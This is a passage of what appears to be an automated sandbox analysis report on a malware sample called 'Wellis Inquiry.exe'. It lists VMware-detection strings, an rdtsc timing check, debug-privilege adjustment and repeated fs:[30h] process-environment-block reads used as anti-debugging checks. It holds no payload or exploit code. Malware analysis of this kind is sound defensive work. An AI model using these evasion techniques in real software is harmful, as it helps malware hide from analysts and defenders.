          Source: explorer.exe, 00000004.00000000.713207756.000000000A897000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000004.00000000.679809243.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01284015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01284015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01272073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01281074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01233884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01233884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01285BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01244257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0123A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01233540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01263D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01268DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
